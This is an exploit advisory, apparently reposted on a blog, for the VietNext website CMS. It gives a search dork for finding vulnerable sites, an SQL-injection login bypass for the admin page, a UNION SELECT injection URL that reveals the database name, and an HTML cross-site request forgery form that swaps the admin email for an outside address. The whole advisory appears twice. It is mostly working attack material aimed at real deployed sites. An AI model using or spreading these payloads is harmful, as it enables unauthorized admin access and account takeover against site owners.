[+] Exploit Title: Thiết Kế Website VietNext Multiple Vulnerabilities
[+] Date: 2016
[+] script: VietNext cms
[+] Software: http://vietnextco.com http://vietnext.vn
[+] Author : Vô Ưu VHB
[+] Website: http://vouuvhb.blogspot.com/
[+] dorks : Designed by Vietnext
---------------------------------------------------------------
vul1.Auth Bypass:
/path/admin/login.php
username:admin'or 'a'='a
password:admin'or 'a'='a
------------------------------
vul2.sql injection:
/path/?frame=product&cat=111%20union%20all%20select%200,1,concat(0x3a,database()),3,4,5,6,7,8,9,10,11,12,13--
------------------------------
vul3.remote change admin mail.
poc:
<html>
<head>
<body>
<h2>coded by pentesters.ir</h2>
<form method="post" name="frmForm" enctype="multipart/form-data" action="http://www.2cto.com/admin/">
<input type="hidden" name="act" value="config_m">
<input type="hidden" name="id" value="3">
<input type="hidden" name="page" value="">
<table border="1" cellpadding="0" cellspacing="0" bordercolor="#0069A8" width="100%">
<tr>
<td>
<table border="0" cellpadding="2" bordercolor="#111111" width="100%" cellspacing="0">
<tr><td height="10"></td></tr>
<tr>
<td width="15%" class="smallfont" align="right"></td>
<td width="1%" class="smallfont" align="center"><font color="#FF0000" size="2">*</font></td>
<td width="83%" class="smallfont">
<input readonly value="adminEmail" type="text" name="txtCode" class="textbox" size="34">
</td>
</tr>
<tr>
<td width="15%" class="smallfont" align="right">Title</td>
<td width="1%" class="smallfont" align="center"></td>
<td width="83%" class="smallfont">
<input value="Email" type="text" name="txtName" class="textbox" size="34">
</td>
</tr>
<tr>
<td width="15%" class="smallfont" align="right">Value</td>
<td width="1%" class="smallfont" align="center"></td>
<td width="83%" class="smallfont">
<input value="vqa.hcm@gmail.com" type="text" name="txtDetail" class="textbox" size="34">
</td>
</tr>
<tr>
<td width="15%" class="smallfont"></td>
<td width="1%" class="smallfont" align="center"></td>
<td width="83%" class="smallfont">
<input type="submit" name="btnSave" VALUE="Update" class="button" onclick="return btnSave_onclick()">
</td>
</body>
</html>
[+] Date: 2016
[+] script: VietNext cms
[+] Software: http://vietnextco.com http://vietnext.vn
[+] Author : Vô Ưu VHB
[+] Website: http://vouuvhb.blogspot.com/
[+] dorks : Designed by Vietnext
---------------------------------------------------------------
vul1.Auth Bypass:
/path/admin/login.php
username:admin'or 'a'='a
password:admin'or 'a'='a
------------------------------
vul2.sql injection:
/path/?frame=product&cat=111%20union%20all%20select%200,1,concat(0x3a,database()),3,4,5,6,7,8,9,10,11,12,13--
------------------------------
vul3.remote change admin mail.
poc:
<html>
<head>
<body>
<h2>coded by pentesters.ir</h2>
<form method="post" name="frmForm" enctype="multipart/form-data" action="http://www.2cto.com/admin/">
<input type="hidden" name="act" value="config_m">
<input type="hidden" name="id" value="3">
<input type="hidden" name="page" value="">
<table border="1" cellpadding="0" cellspacing="0" bordercolor="#0069A8" width="100%">
<tr>
<td>
<table border="0" cellpadding="2" bordercolor="#111111" width="100%" cellspacing="0">
<tr><td height="10"></td></tr>
<tr>
<td width="15%" class="smallfont" align="right"></td>
<td width="1%" class="smallfont" align="center"><font color="#FF0000" size="2">*</font></td>
<td width="83%" class="smallfont">
<input readonly value="adminEmail" type="text" name="txtCode" class="textbox" size="34">
</td>
</tr>
<tr>
<td width="15%" class="smallfont" align="right">Title</td>
<td width="1%" class="smallfont" align="center"></td>
<td width="83%" class="smallfont">
<input value="Email" type="text" name="txtName" class="textbox" size="34">
</td>
</tr>
<tr>
<td width="15%" class="smallfont" align="right">Value</td>
<td width="1%" class="smallfont" align="center"></td>
<td width="83%" class="smallfont">
<input value="vqa.hcm@gmail.com" type="text" name="txtDetail" class="textbox" size="34">
</td>
</tr>
<tr>
<td width="15%" class="smallfont"></td>
<td width="1%" class="smallfont" align="center"></td>
<td width="83%" class="smallfont">
<input type="submit" name="btnSave" VALUE="Update" class="button" onclick="return btnSave_onclick()">
</td>
</body>
</html>
0 nhận xét:
Post a Comment